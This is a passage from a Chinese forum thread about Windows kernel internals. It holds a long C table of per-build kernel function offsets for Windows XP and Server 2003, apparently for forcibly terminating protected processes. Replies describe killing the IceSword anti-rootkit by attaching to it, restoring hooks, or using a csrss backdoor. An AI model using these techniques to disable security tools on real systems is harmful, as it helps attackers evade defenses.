0x00026EE8, } }, { TEXT("ntoskrnl 5.1.2600.2096 (xpsp_sp2_rc1.040311-2315)"), TEXT("9996D1AF67964E6A947A9EA33EC8B9112"), { .NtCreateProcess = (void*) 0x000D4928, .NtCreateProcessEx = (void*) 0x000B3866, .NtCreateSection = (void*) 0x0009BA48, .NtTerminateProcess = (void*) 0x00100121, .NtQueryInformationFile = (void*) 0x00099828, .NtQueryKey = (void*) 0x000980D1, .NtQueryValueKey = (void*) 0x0008F4CA, .NtSetInformationFile = (void*) 0x0009A46B, .NtSetValueKey = (void*) 0x000A0C64, .ObpFreeObject = (void*) 0x0008C88D, .PspTerminateProcess = (void*) 0x001557CE, .swprintf = (void*) 0x00020898, .ZwOpenProcess = (void*) 0x000072BE, .ZwProtectVirtualMemory = (void*) 0x0000741C, .ZwReadVirtualMemory = (void*) 0x00007877, } }, { TEXT("ntkrnlpa 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)"), TEXT("BD8F451F3E754ED8A34B50560CEB08E31"), { .NtCreateProcess = (void*) 0x000EECE8, .NtCreateProcessEx = (void*) 0x000EEC32, .NtCreateSection = (void*) 0x000C823E, .NtTerminateProcess = (void*) 0x000F04C8, .NtQueryInformationFile = (void*) 0x00097B16, .NtQueryKey = (void*) 0x0014328C, .NtQueryValueKey = (void*) 0x0013FC8C, .NtSetInformationFile = (void*) 0x0009811A, .NtSetValueKey = (void*) 0x00140292, .ObpFreeObject = (void*) 0x000DE212, .PspTerminateProcess = (void*) 0x000F0642, .swprintf = (void*) 0x0005FBA5, .ZwOpenProcess = (void*) 0x00026BFC, .ZwProtectVirtualMemory = (void*) 0x00026D28, .ZwReadVirtualMemory = (void*) 0x000270FC, } }, { TEXT("ntkrnlmp 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)"), TEXT("7DE39A3E89DA4B378B95A09FA3A6398C2"), { .NtCreateProcess = (void*) 0x000DDA28, .NtCreateProcessEx = (void*) 0x000B45EC, .NtCreateSection = (void*) 0x00097E25, .NtTerminateProcess = (void*) 0x000B5E75, .NtQueryInformationFile = (void*) 0x000A9C35, .NtQueryKey = (void*) 0x000A329E, .NtQueryValueKey = (void*) 0x0009D361, .NtSetInformationFile = (void*) 0x000AB2C9, .NtSetValueKey = (void*) 0x000AD921, .ObpFreeObject = (void*) 0x00097640, .PspTerminateProcess = (void*) 0x0015F016, .swprintf = (void*) 0x000236A5, .ZwOpenProcess = (void*) 0x0000D110, .ZwProtectVirtualMemory = (void*) 0x0000D26E, .ZwReadVirtualMemory = (void*) 0x0000D6C9, } }, { TEXT("ntkrpamp 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)"), TEXT("C40DD53A8D3D4AE3A24CE6BE866649C91"), { .NtCreateProcess = (void*) 0x000F8A1C, .NtCreateProcessEx = (void*) 0x000F8966, .NtCreateSection = (void*) 0x000D2DEE, .NtTerminateProcess = (void*) 0x000FA170, .NtQueryInformationFile = (void*) 0x000A27F8, .NtQueryKey = (void*) 0x0014C702, .NtQueryValueKey = (void*) 0x00149102, .NtSetInformationFile = (void*) 0x000A2DC4, .NtSetValueKey = (void*) 0x00149708, .ObpFreeObject = (void*) 0x000E874E, .PspTerminateProcess = (void*) 0x000FA2EA, .swprintf = (void*) 0x00063635, .ZwOpenProcess = (void*) 0x00028A28, .ZwProtectVirtualMemory = (void*) 0x00028B54, .ZwReadVirtualMemory = (void*) 0x00028F28, } }, { TEXT("ntoskrnl 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)"), TEXT("8592B6763F34476B9BB560395A383F962"), { .NtCreateProcess = (void*) 0x000DC543, .NtCreateProcessEx = (void*) 0x000B15D3, .NtCreateSection = (void*) 0x0008DB1B, .NtTerminateProcess = (void*) 0x000B3E1E, .NtQueryInformationFile = (void*) 0x0009BD12, .NtQueryKey = (void*) 0x00098473, .NtQueryValueKey = (void*) 0x000949A8, .NtSetInformationFile = (void*) 0x000A2E7E, .NtSetValueKey = (void*) 0x0009E527, .ObpFreeObject = (void*) 0x0008CEA0, .PspTerminateProcess = (void*) 0x00155BC2, .swprintf = (void*) 0x0002043A, .ZwOpenProcess = (void*) 0x00006724, .ZwProtectVirtualMemory = (void*) 0x00006882, .ZwReadVirtualMemory = (void*) 0x00006CDD, } }, { TEXT("ntkrnlmp 5.1.2600.2622 (xpsp_sp2_gdr.050301-1519)"), TEXT("AA1EE1B2A63A4232A379F3EFDDC4CFE82"), { .NtCreateProcess = (void*) 0x000DD0C0, .NtCreateProcessEx = (void*) 0x000B3CC0, .NtCreateSection = (void*) 0x00095E25, .NtTerminateProcess = (void*) 0x000B5549, .NtQueryInformationFile = (void*) 0x000A7CAB, .NtQueryKey = (void*) 0x000A0FFA, .NtQueryValueKey = (void*) 0x0009B100, .NtSetInformationFile = (void*) 0x000AB9EE, .NtSetValueKey = (void*) 0x000A8F03, .ObpFreeObject = (void*) 0x00095640, .PspTerminateProcess = (void*) 0x0015CFF8, .swprintf = (void*) 0x0002388A, .ZwOpenProcess = (void*) 0x0000CC0A, .ZwProtectVirtualMemory = (void*) 0x0000CD36, .ZwReadVirtualMemory = (void*) 0x0000D10A, } }, { TEXT("ntkrnlpa 5.1.2600.2622 (xpsp_sp2_gdr.050301-1519)"), TEXT("89C2A9EB56A74E2D8269AFD1D835BA331"), { .NtCreateProcess = (void*) 0x000EECC6, .NtCreateProcessEx = (void*) 0x000EEC10, .NtCreateSection = (void*) 0x000C8222, .NtTerminateProcess = (void*) 0x000F04A6, .NtQueryInformationFile = (void*) 0x00097B00, .NtQueryKey = (void*) 0x00143294, .NtQueryValueKey = (void*) 0x0013FC94, .NtSetInformationFile = (void*) 0x00098104, .NtSetValueKey = (void*) 0x0014029A, .ObpFreeObject = (void*) 0x000DE1F6, .PspTerminateProcess = (void*) 0x000F0620, .swprintf = (void*) 0x0005FBA5, .ZwOpenProcess = (void*) 0x00026BFC, .ZwProtectVirtualMemory = (void*) 0x00026D28, .ZwReadVirtualMemory = (void*) 0x000270FC, } }, { TEXT("ntoskrnl 5.1.2600.2622 (xpsp_sp2_gdr.050301-1519)"), TEXT("32962337F0F646388B39535CD8DD70E82"), { .NtCreateProcess = (void*) 0x000D6314, .NtCreateProcessEx = (void*) 0x000A941A, .NtCreateSection = (void*) 0x0008D41B, .NtTerminateProcess = (void*) 0x000ABC2B, .NtQueryInformationFile = (void*) 0x0009B40A, .NtQueryKey = (void*) 0x00097B71, .NtQueryValueKey = (void*) 0x000940BB, .NtSetInformationFile = (void*) 0x000A0E2C, .NtSetValueKey = (void*) 0x0009DC1D, .ObpFreeObject = (void*) 0x0008C7A1, .PspTerminateProcess = (void*) 0x001554A6, .swprintf = (void*) 0x0001C047, .ZwOpenProcess = (void*) 0x00006044, .ZwProtectVirtualMemory = (void*) 0x00006170, .ZwReadVirtualMemory = (void*) 0x00006544, } }, { TEXT("ntkrpamp 5.1.2600.2622 (xpsp_sp2_gdr.050301-1519)"), TEXT("430480FAAC4F4A45980B99443EDC145E1"), { .NtCreateProcess = (void*) 0x000F8A1C, .NtCreateProcessEx = (void*) 0x000F8966, .NtCreateSection = (void*) 0x000D2DE6, .NtTerminateProcess = (void*) 0x000FA16E, .NtQueryInformationFile = (void*) 0x000A27E2, .NtQueryKey = (void*) 0x0014C708, .NtQueryValueKey = (void*) 0x00149108, .NtSetInformationFile = (void*) 0x000A2DAE, .NtSetValueKey = (void*) 0x0014970E, .ObpFreeObject = (void*) 0x000E8746, .PspTerminateProcess = (void*) 0x000FA2E8, .swprintf = (void*) 0x00063635, .ZwOpenProcess = (void*) 0x00028A28, .ZwProtectVirtualMemory = (void*) 0x00028B54, .ZwReadVirtualMemory = (void*) 0x00028F28, } }, { TEXT("ntkrnlpa 5.1.2600.2622 (xpsp.050301-1521)"), TEXT("8FB67EFA263E45C4BEF1AC0748EC9EB01"), { .NtCreateProcess = (void*) 0x000EECE4, .NtCreateProcessEx = (void*) 0x000EEC2E, .NtCreateSection = (void*) 0x000C8212, .NtTerminateProcess = (void*) 0x000F04C4, .NtQueryInformationFile = (void*) 0x00097B00, .NtQueryKey = (void*) 0x001432B2, .NtQueryValueKey = (void*) 0x0013FCB2, .NtSetInformationFile = (void*) 0x00098104, .NtSetValueKey = (void*) 0x001402B8, .ObpFreeObject = (void*) 0x000DE1E6, .PspTerminateProcess = (void*) 0x000F063E, .swprintf = (void*) 0x0005FBB5, .ZwOpenProcess = (void*) 0x00026C10, .ZwProtectVirtualMemory = (void*) 0x00026D3C, .ZwReadVirtualMemory = (void*) 0x00027110, } }, { TEXT("ntoskrnl 5.1.2600.2622 (xpsp.050301-1521)"), TEXT("012E81B8E0724418A1E96DD7F1C5CB9F2"), { .NtCreateProcess = (void*) 0x000D633C, .NtCreateProcessEx = (void*) 0x000A941A, .NtCreateSection = (void*) 0x0008D41B, .NtTerminateProcess = (void*) 0x000ABC2B, .NtQueryInformationFile = (void*) 0x0009B40A, .NtQueryKey = (void*) 0x00097B71, .NtQueryValueKey = (void*) 0x000940BB, .NtSetInformationFile = (void*) 0x000A0E2C, .NtSetValueKey = (void*) 0x0009DC1D, .ObpFreeObject = (void*) 0x0008C7A1, .PspTerminateProcess = (void*) 0x001554FA, .swprintf = (void*) 0x0001C047, .ZwOpenProcess = (void*) 0x00006044, .ZwProtectVirtualMemory = (void*) 0x00006170, .ZwReadVirtualMemory = (void*) 0x00006544, } }, { TEXT("ntkrpamp 5.1.2600.2643 (xpsp.050329-1536)"), TEXT("F34F1BF50056422FB0FE176944516D4A1"), { .NtCreateProcess = (void*) 0x000F8A3A, .NtCreateProcessEx = (void*) 0x000F8984, .NtCreateSection = (void*) 0x000D2DD6, .NtTerminateProcess = (void*) 0x000FA18C, .NtQueryInformationFile = (void*) 0x000A27E2, .NtQueryKey = (void*) 0x0014C726, .NtQueryValueKey = (void*) 0x00149126, .NtSetInformationFile = (void*) 0x000A2DAE, .NtSetValueKey = (void*) 0x0014972C, .ObpFreeObject = (void*) 0x000E8736, .PspTerminateProcess = (void*) 0x000FA306, .swprintf = (void*) 0x00063645, .ZwOpenProcess = (void*) 0x00028A3C, .ZwProtectVirtualMemory = (void*) 0x00028B68, .ZwReadVirtualMemory = (void*) 0x00028F3C, } }, { TEXT("ntkrnlmp 5.1.2600.2643 (xpsp.050329-1536)"), TEXT("8A840CDB24D446469499CC12974C0D322"), { .NtCreateProcess = (void*) 0x000DD0A8, .NtCreateProcessEx = (void*) 0x000B3CC0, .NtCreateSection = (void*) 0x00095E25, .NtTerminateProcess = (void*) 0x000B5549, .NtQueryInformationFile = (void*) 0x000A7CAB, .NtQueryKey = (void*) 0x000A0FFA, .NtQueryValueKey = (void*) 0x0009B100, .NtSetInformationFile = (void*) 0x000AB9EE, .NtSetValueKey = (void*) 0x000A8F03, .ObpFreeObject = (void*) 0x00095640, .PspTerminateProcess = (void*) 0x0015D026, .swprintf = (void*) 0x0002387A, .ZwOpenProcess = (void*) 0x0000CBFA, .ZwProtectVirtualMemory = (void*) 0x0000CD26, .ZwReadVirtualMemory = (void*) 0x0000D0FA, } }, { TEXT("ntkrpamp 5.1.2600.2705 (xpsp.050622-1524)"), TEXT("1BBE06CABB4C4965B304101D416846321"), { .NtCreateProcess = (void*) 0x000F8A56, .NtCreateProcessEx = (void*) 0x000F89A0, .NtCreateSection = (void*) 0x000D2DF2, .NtTerminateProcess = (void*) 0x000FA1A8, .NtQueryInformationFile = (void*) 0x000A27FE, .NtQueryKey = (void*) 0x0014C758, .NtQueryValueKey = (void*) 0x00149158, .NtSetInformationFile = (void*) 0x000A2DCA, .NtSetValueKey = (void*) 0x0014975E, .ObpFreeObject = (void*) 0x000E8752, .PspTerminateProcess = (void*) 0x000FA322, .swprintf = (void*) 0x000637B5, .ZwOpenProcess = (void*) 0x00028B0C, .ZwProtectVirtualMemory = (void*) 0x00028C38, .ZwReadVirtualMemory = (void*) 0x0002900C, } }, { TEXT("ntkrnlmp 5.1.2600.2705 (xpsp.050622-1524)"), TEXT("46BA5C69C3A2424D99AE8F7B790630C82"), { .NtCreateProcess = (void*) 0x000DD0A8, .NtCreateProcessEx = (void*) 0x000B3CC0, .NtCreateSection = (void*) 0x00095E25, .NtTerminateProcess = (void*) 0x000B5549, .NtQueryInformationFile = (void*) 0x000A7CAB, .NtQueryKey = (void*) 0x000A0FFA, .NtQueryValueKey = (void*) 0x0009B100, .NtSetInformationFile = (void*) 0x000AB9EE, .NtSetValueKey = (void*) 0x000A8F03, .ObpFreeObject = (void*) 0x00095640, .PspTerminateProcess = (void*) 0x0015D07E, .swprintf = (void*) 0x0002655A, .ZwOpenProcess = (void*) 0x0000CBFA, .ZwProtectVirtualMemory = (void*) 0x0000CD26, .ZwReadVirtualMemory = (void*) 0x0000D0FA, } }, { TEXT("ntkrpamp 5.1.2600.2765 (xpsp.050928-1517)"), TEXT("93B3151FBA1F444E921B0B7AF2BADA5A1"), { .NtCreateProcess = (void*) 0x000F8A56, .NtCreateProcessEx = (void*) 0x000F89A0, .NtCreateSection = (void*) 0x000D2DF2, .NtTerminateProcess = (void*) 0x000FA1A8, .NtQueryInformationFile = (void*) 0x000A27FE, .NtQueryKey = (void*) 0x0014C758, .NtQueryValueKey = (void*) 0x00149158, .NtSetInformationFile = (void*) 0x000A2DCA, .NtSetValueKey = (void*) 0x0014975E, .ObpFreeObject = (void*) 0x000E8752, .PspTerminateProcess = (void*) 0x000FA322, .swprintf = (void*) 0x000637B5, .ZwOpenProcess = (void*) 0x00028B0C, .ZwProtectVirtualMemory = (void*) 0x00028C38, .ZwReadVirtualMemory = (void*) 0x0002900C, } }, { TEXT("ntkrnlpa 5.1.2600.2765 (xpsp.050928-1517)"), TEXT("CC2DE018A01244D4832AF532340DCAC41"), { .NtCreateProcess = (void*) 0x000EEE80, .NtCreateProcessEx = (void*) 0x000EEDCA, .NtCreateSection = (void*) 0x000C83AE, .NtTerminateProcess = (void*) 0x000F0660, .NtQueryInformationFile = (void*) 0x00097C9C, .NtQueryKey = (void*) 0x00143464, .NtQueryValueKey = (void*) 0x0013FE64, .NtSetInformationFile = (void*) 0x000982A0, .NtSetValueKey = (void*) 0x0014046A, .ObpFreeObject = (void*) 0x000DE382, .PspTerminateProcess = (void*) 0x000F07DA, .swprintf = (void*) 0x0005FCF5, .ZwOpenProcess = (void*) 0x00026D28, .ZwProtectVirtualMemory = (void*) 0x00026E54, .ZwReadVirtualMemory = (void*) 0x00027228, } }, { TEXT("ntoskrnl 5.1.2600.2765 (xpsp.050928-1517)"), TEXT("7DEB5F662C1B4675A79BE082B317F5402"), { .NtCreateProcess = (void*) 0x000D64AC, .NtCreateProcessEx = (void*) 0x000A959A, .NtCreateSection = (void*) 0x0008D59B, .NtTerminateProcess = (void*) 0x000ABDAB, .NtQueryInformationFile = (void*) 0x0009B58A, .NtQueryKey = (void*) 0x00097CF1, .NtQueryValueKey = (void*) 0x0009423B, .NtSetInformationFile = (void*) 0x000A0FAC, .NtSetValueKey = (void*) 0x0009DD9D, .ObpFreeObject = (void*) 0x0008C921, .PspTerminateProcess = (void*) 0x001556D2, .swprintf = (void*) 0x000208EE, .ZwOpenProcess = (void*) 0x00006044, .ZwProtectVirtualMemory = (void*) 0x00006170, .ZwReadVirtualMemory = (void*) 0x00006544, } }, { TEXT("ntkrnlmp 5.1.2600.2765 (xpsp.050928-1517)"), TEXT("040335E8D8E841DD9729CF44B21C11792"), { .NtCreateProcess = (void*) 0x000DD0A8, .NtCreateProcessEx = (void*) 0x000B3CC0, .NtCreateSection = (void*) 0x00095E25, .NtTerminateProcess = (void*) 0x000B5549, .NtQueryInformationFile = (void*) 0x000A7CAB, .NtQueryKey = (void*) 0x000A0FFA, .NtQueryValueKey = (void*) 0x0009B100, .NtSetInformationFile = (void*) 0x000AB9EE, .NtSetValueKey = (void*) 0x000A8F03, .ObpFreeObject = (void*) 0x00095640, .PspTerminateProcess = (void*) 0x0015D07E, .swprintf = (void*) 0x0002655A, .ZwOpenProcess = (void*) 0x0000CBFA, .ZwProtectVirtualMemory = (void*) 0x0000CD26, .ZwReadVirtualMemory = (void*) 0x0000D0FA, } }, { TEXT("ntkrpamp 5.1.2600.2774 (xpsp.051011-1528)"), TEXT("9BEFAFFECB0B4E7684D537E7896F1D091"), { .NtCreateProcess = (void*) 0x000F8A5C, .NtCreateProcessEx = (void*) 0x000F89A6, .NtCreateSection = (void*) 0x000D2DF2, .NtTerminateProcess = (void*) 0x000FA1AE, .NtQueryInformationFile = (void*) 0x000A27FE, .NtQueryKey = (void*) 0x0014C75E, .NtQueryValueKey = (void*) 0x0014915E, .NtSetInformationFile = (void*) 0x000A2DCA, .NtSetValueKey = (void*) 0x00149764, .ObpFreeObject = (void*) 0x000E8752, .PspTerminateProcess = (void*) 0x000FA328, .swprintf = (void*) 0x00063735, .ZwOpenProcess = (void*) 0x00028B0C, .ZwProtectVirtualMemory = (void*) 0x00028C38, .ZwReadVirtualMemory = (void*) 0x0002900C, } }, { TEXT("ntkrnlpa 5.1.2600.2774 (xpsp.051011-1528)"), TEXT("4A60D40C68D74A7A91F60EB5C4B91D1B1"), { .NtCreateProcess = (void*) 0x000EEE06, .NtCreateProcessEx = (void*) 0x000EED50, .NtCreateSection = (void*) 0x000C832E, .NtTerminateProcess = (void*) 0x000F05E6, .NtQueryInformationFile = (void*) 0x00097C1C, .NtQueryKey = (void*) 0x001433EA, .NtQueryValueKey = (void*) 0x0013FDEA, .NtSetInformationFile = (void*) 0x00098220, .NtSetValueKey = (void*) 0x001403F0, .ObpFreeObject = (void*) 0x000DE302, .PspTerminateProcess = (void*) 0x000F0760, .swprintf = (void*) 0x0005FC75, .ZwOpenProcess = (void*) 0x00026D28, .ZwProtectVirtualMemory = (void*) 0x00026E54, .ZwReadVirtualMemory = (void*) 0x00027228, } }, { TEXT("ntoskrnl 5.1.2600.2774 (xpsp.051011-1528)"), TEXT("53D901D8DB1340B4B49A8F1155E449E22"), { .NtCreateProcess = (void*) 0x000D642C, .NtCreateProcessEx = (void*) 0x000A951A, .NtCreateSection = (void*) 0x0008D51B, .NtTerminateProcess = (void*) 0x000ABD2B, .NtQueryInformationFile = (void*) 0x0009B50A, .NtQueryKey = (void*) 0x00097C71, .NtQueryValueKey = (void*) 0x000941BB, .NtSetInformationFile = (void*) 0x000A0F2C, .NtSetValueKey = (void*) 0x0009DD1D, .ObpFreeObject = (void*) 0x0008C8A1, .PspTerminateProcess = (void*) 0x00155646, .swprintf = (void*) 0x000208EE, .ZwOpenProcess = (void*) 0x00006044, .ZwProtectVirtualMemory = (void*) 0x00006170, .ZwReadVirtualMemory = (void*) 0x00006544, } }, { TEXT("ntkrnlmp 5.1.2600.2774 (xpsp.051011-1528)"), TEXT("C5C5A2CF44924714BD7B4B42F2B227422"), { .NtCreateProcess = (void*) 0x000DD0A8, .NtCreateProcessEx = (void*) 0x000B3CC0, .NtCreateSection = (void*) 0x00095E25, .NtTerminateProcess = (void*) 0x000B5549, .NtQueryInformationFile = (void*) 0x000A7CAB, .NtQueryKey = (void*) 0x000A0FFA, .NtQueryValueKey = (void*) 0x0009B100, .NtSetInformationFile = (void*) 0x000AB9EE, .NtSetValueKey = (void*) 0x000A8F03, .ObpFreeObject = (void*) 0x00095640, .PspTerminateProcess = (void*) 0x0015D094, .swprintf = (void*) 0x0002385A, .ZwOpenProcess = (void*) 0x0000CBFA, .ZwProtectVirtualMemory = (void*) 0x0000CD26, .ZwReadVirtualMemory = (void*) 0x0000D0FA, } }, { TEXT("ntkrpamp 5.1.2600.2845 (xpsp.060210-1526)"), TEXT("1AFF284D7C434F43979B2AE28D1E4EE21"), { .NtCreateProcess = (void*) 0x000F8B10, .NtCreateProcessEx = (void*) 0x000F8A5A, .NtCreateSection = (void*) 0x000D2EA6, .NtTerminateProcess = (void*) 0x000FA262, .NtQueryInformationFile = (void*) 0x000A2888, .NtQueryKey = (void*) 0x0014C812, .NtQueryValueKey = (void*) 0x00149212, .NtSetInformationFile = (void*) 0x000A2E54, .NtSetValueKey = (void*) 0x00149818, .ObpFreeObject = (void*) 0x000E8806, .PspTerminateProcess = (void*) 0x000FA3DC, .swprintf = (void*) 0x000638D5, .ZwOpenProcess = (void*) 0x00028CA8, .ZwProtectVirtualMemory = (void*) 0x00028DD4, .ZwReadVirtualMemory = (void*) 0x000291A8, } }, { TEXT("ntkrnlmp 5.1.2600.2845 (xpsp.060210-1526)"), TEXT("4289FD8BCB254A3CA5A2FF206D2E535D2"), { .NtCreateProcess = (void*) 0x000E9C08, .NtCreateProcessEx = (void*) 0x000B3B10, .NtCreateSection = (void*) 0x00095E25, .NtTerminateProcess = (void*) 0x000B5399, .NtQueryInformationFile = (void*) 0x000A7CBB, .NtQueryKey = (void*) 0x000A0FAC, .NtQueryValueKey = (void*) 0x0009B100, .NtSetInformationFile = (void*) 0x000ABBC5, .NtSetValueKey = (void*) 0x000A8F13, .ObpFreeObject = (void*) 0x00095640, .PspTerminateProcess = (void*) 0x0015D13A, .swprintf = (void*) 0x0002655A, .ZwOpenProcess = (void*) 0x0000CBFA, .ZwProtectVirtualMemory = (void*) 0x0000CD26, .ZwReadVirtualMemory = (void*) 0x0000D0FA, } }, { TEXT("ntkrpamp 5.1.2600.2853 (xpsp_sp2_gdr.060220-1746)"), TEXT("AD416A59B488487E9F2D08FCC806B0581"), { .NtCreateProcess = (void*) 0x000F8AD4, .NtCreateProcessEx = (void*) 0x000F8A1E, .NtCreateSection = (void*) 0x000D2E9E, .NtTerminateProcess = (void*) 0x000FA226, .NtQueryInformationFile = (void*) 0x000A286C, .NtQueryKey = (void*) 0x0014C7C0, .NtQueryValueKey = (void*) 0x001491C0, .NtSetInformationFile = (void*) 0x000A2E38, .NtSetValueKey = (void*) 0x001497C6, .ObpFreeObject = (void*) 0x000E87FE, .PspTerminateProcess = (void*) 0x000FA3A0, .swprintf = (void*) 0x000637F5, .ZwOpenProcess = (void*) 0x00028BCC, .ZwProtectVirtualMemory = (void*) 0x00028CF8, .ZwReadVirtualMemory = (void*) 0x000290CC, } }, { TEXT("ntkrnlmp 5.1.2600.2853 (xpsp_sp2_gdr.060220-1746)"), TEXT("9B934D5224B84CB396AF163480C147822"), { .NtCreateProcess = (void*) 0x000E9BF0, .NtCreateProcessEx = (void*) 0x000B3B10, .NtCreateSection = (void*) 0x00095E25, .NtTerminateProcess = (void*) 0x000B5399, .NtQueryInformationFile = (void*) 0x000A7CBB, .NtQueryKey = (void*) 0x000A0FAC, .NtQueryValueKey = (void*) 0x0009B100, .NtSetInformationFile = (void*) 0x000ABBC5, .NtSetValueKey = (void*) 0x000A8F13, .ObpFreeObject = (void*) 0x00095640, .PspTerminateProcess = (void*) 0x0015D0BA, .swprintf = (void*) 0x0002387A, .ZwOpenProcess = (void*) 0x0000CC0A, .ZwProtectVirtualMemory = (void*) 0x0000CD36, .ZwReadVirtualMemory = (void*) 0x0000D10A, } }, { TEXT("ntkrnlpa 5.1.2600.2868 (xpsp.060315-1524)"), TEXT("23C083B907B0431CA019DA7F5E42A2671"), { .NtCreateProcess = (void*) 0x000EF03E, .NtCreateProcessEx = (void*) 0x000EEF88, .NtCreateSection = (void*) 0x000C8566, .NtTerminateProcess = (void*) 0x000F081C, .NtQueryInformationFile = (void*) 0x00097E2A, .NtQueryKey = (void*) 0x00143612, .NtQueryValueKey = (void*) 0x00140012, .NtSetInformationFile = (void*) 0x0009842E, .NtSetValueKey = (void*) 0x00140618, .ObpFreeObject = (void*) 0x000DE53A, .PspTerminateProcess = (void*) 0x000F0996, .swprintf = (void*) 0x0005FE35, .ZwOpenProcess = (void*) 0x00026EEC, .ZwProtectVirtualMemory = (void*) 0x00027018, .ZwReadVirtualMemory = (void*) 0x000273EC, } }, { TEXT("ntoskrnl 5.1.2600.2868 (xpsp.060315-1524)"), TEXT("795D57E8CCA7486387098DEFE009772C2"), { .NtCreateProcess = (void*) 0x000D9BB5, .NtCreateProcessEx = (void*) 0x000AAF82, .NtCreateSection = (void*) 0x0008D71B, .NtTerminateProcess = (void*) 0x000AD840, .NtQueryInformationFile = (void*) 0x0009A57E, .NtQueryKey = (void*) 0x00097CB9, .NtQueryValueKey = (void*) 0x00094203, .NtSetInformationFile = (void*) 0x0009FF9C, .NtSetValueKey = (void*) 0x0009CD8D, .ObpFreeObject = (void*) 0x0008CAA1, .PspTerminateProcess = (void*) 0x0015592E, .swprintf = (void*) 0x000208EE, .ZwOpenProcess = (void*) 0x00006044, .ZwProtectVirtualMemory = (void*) 0x00006170, .ZwReadVirtualMemory = (void*) 0x00006544, } }, { TEXT("ntkrnlpa 5.2.3790.0 (srv03_rtm.030324-2048)"), TEXT("3E5EC2822A12407CAE564E6D6D0619B31"), { .NtCreateProcess = (void*) 0x0011CFC8, .NtCreateProcessEx = (void*) 0x0011CF20, .NtCreateSection = (void*) 0x000F4CDC, .NtTerminateProcess = (void*) 0x0011E640, .NtQueryInformationFile = (void*) 0x000C0004, .NtQueryKey = (void*) 0x00093D5E, .NtQueryValueKey = (void*) 0x00093FDE, .NtSetInformationFile = (void*) 0x000C05B2, .NtSetValueKey = (void*) 0x00090DC4, .ObpFreeObject = (void*) 0x0010CA98, .PspTerminateProcess = (void*) 0x0011E7D4, .swprintf = (void*) 0x00061F06, .ZwOpenProcess = (void*) 0x00027BD0, .ZwProtectVirtualMemory = (void*) 0x00027CFC, .ZwReadVirtualMemory = (void*) 0x000280F8, } }, { TEXT("ntoskrnl 5.2.3790.0 (srv03_rtm.030324-2048)"), TEXT("112679F166D6449394EFC30950DE9E032"), { .NtCreateProcess = (void*) 0x000DF684, .NtCreateProcessEx = (void*) 0x000B0FE3, .NtCreateSection = (void*) 0x00095ECA, .NtTerminateProcess = (void*) 0x000B2CBA, .NtQueryInformationFile = (void*) 0x000A72CF, .NtQueryKey = (void*) 0x000A2C31, .NtQueryValueKey = (void*) 0x00099D61, .NtSetInformationFile = (void*) 0x0009A747, .NtSetValueKey = (void*) 0x000B4859, .ObpFreeObject = (void*) 0x00095231, .PspTerminateProcess = (void*) 0x000D3B76, .swprintf = (void*) 0x0002D6A9, .ZwOpenProcess = (void*) 0x000081D2, .ZwProtectVirtualMemory = (void*) 0x00008330, .ZwReadVirtualMemory = (void*) 0x000087B8, } }, { TEXT("ntkrnlpa 5.2.3790.1830 (srv03_sp1_rtm.050324-1447)"), TEXT("80A87123E83C40579E8319E5DB7B523C1"), { .NtCreateProcess = (void*) 0x00141D12, .NtCreateProcessEx = (void*) 0x00141C5C, .NtCreateSection = (void*) 0x0011EB70, .NtTerminateProcess = (void*) 0x001434F4, .NtQueryInformationFile = (void*) 0x000E7860, .NtQueryKey = (void*) 0x000B3110, .NtQueryValueKey = (void*) 0x000B339E, .NtSetInformationFile = (void*) 0x000E7E62, .NtSetValueKey = (void*) 0x000B396C, .ObpFreeObject = (void*) 0x001304A8, .PspTerminateProcess = (void*) 0x00143690, .swprintf = (void*) 0x0007D2EB, .ZwOpenProcess = (void*) 0x0002C940, .ZwProtectVirtualMemory = (void*) 0x0002CA6C, .ZwReadVirtualMemory = (void*) 0x0002CE68, } }, { TEXT("ntoskrnl 5.2.3790.1830 (srv03_sp1_rtm.050324-1447)"), TEXT("4106003FF97D4BCBA99245BF2172A8C12"), { .NtCreateProcess = (void*) 0x000CA98C, .NtCreateProcessEx = (void*) 0x0011DFDB, .NtCreateSection = (void*) 0x001087E4, .NtTerminateProcess = (void*) 0x00112F97, .NtQueryInformationFile = (void*) 0x00107F94, .NtQueryKey = (void*) 0x0012E22D, .NtQueryValueKey = (void*) 0x0012C2BB, .NtSetInformationFile = (void*) 0x0010F92B, .NtSetValueKey = (void*) 0x0012C6EB, .ObpFreeObject = (void*) 0x001024BD, .PspTerminateProcess = (void*) 0x0019701A, .swprintf = (void*) 0x00018CB7, .ZwOpenProcess = (void*) 0x00021B54, .ZwProtectVirtualMemory = (void*) 0x00021C80, .ZwReadVirtualMemory = (void*) 0x0002207C, } }, } ; |
|
|
7楼#
发布于:2007-01-13 13:36
太复杂了。。。
最简单的就是Attach到icesword进程或你想要结束的进程,然后NtTerminateProcess 这招屡试不爽 |
|
|
|
8楼#
发布于:2007-01-13 20:19
楼上,你确定可以?我已经吐血了~
|
|
|
|
9楼#
发布于:2007-01-13 20:58
引用第7楼xikug于2007-01-13 13:36发表的“”: 对于某类防终止进程你简简单单的Attach不上去的~ |
|
|
10楼#
发布于:2007-01-13 21:34
引用第9楼xyzreg于2007-01-13 20:58发表的“”: YES~ |
|
|
|
11楼#
发布于:2007-01-13 21:42
攻与防的任何一方可以说都没有任何绝对的优势...都只能见招拆招...
IS不就是Inline HOOK了几个函数吗... 你的恢复Inline Hook的办法也不是万能的... 当然我的attach也不是万能的...某些东西attach不上去, 但总有办法能绕过去的... |
|
|
|
12楼#
发布于:2007-01-14 12:43
xikug,你上面那个截图是哪个软件的啊?能否告知
|
|
|
13楼#
发布于:2007-01-14 14:28
我自己写的...暂时还没有公开...
|
|
|
|
14楼#
发布于:2007-01-15 00:34
引用第11楼xikug于2007-01-13 21:42发表的“”: 显然。 |
|
|
15楼#
发布于:2007-01-15 18:08
引用第11楼xikug于2007-01-13 21:42发表的“”: xiKug西裤.... 偶认识你啊...发一个给偶...发在diy内部版块中也可以.  西裤偶给你测试测试... 谁知道效果怎么样...放心我不放出!!!! |
|
|
16楼#
发布于:2007-01-18 14:15
icesword这种东西,在用户态就可以结束掉.
只要在csrss里搞个东西出来,然后利用它在is里写点垃圾就可以了. 进程这玩意是很脆弱的. |
|
|
|
17楼#
发布于:2007-01-18 15:08
引用第16楼cardmagic于2007-01-18 14:15发表的“”: 呵呵,ep_xoff就提供过那个小玩意,csrss的backdoor,呵呵 |
|
|
|
18楼#
发布于:2007-01-18 16:29
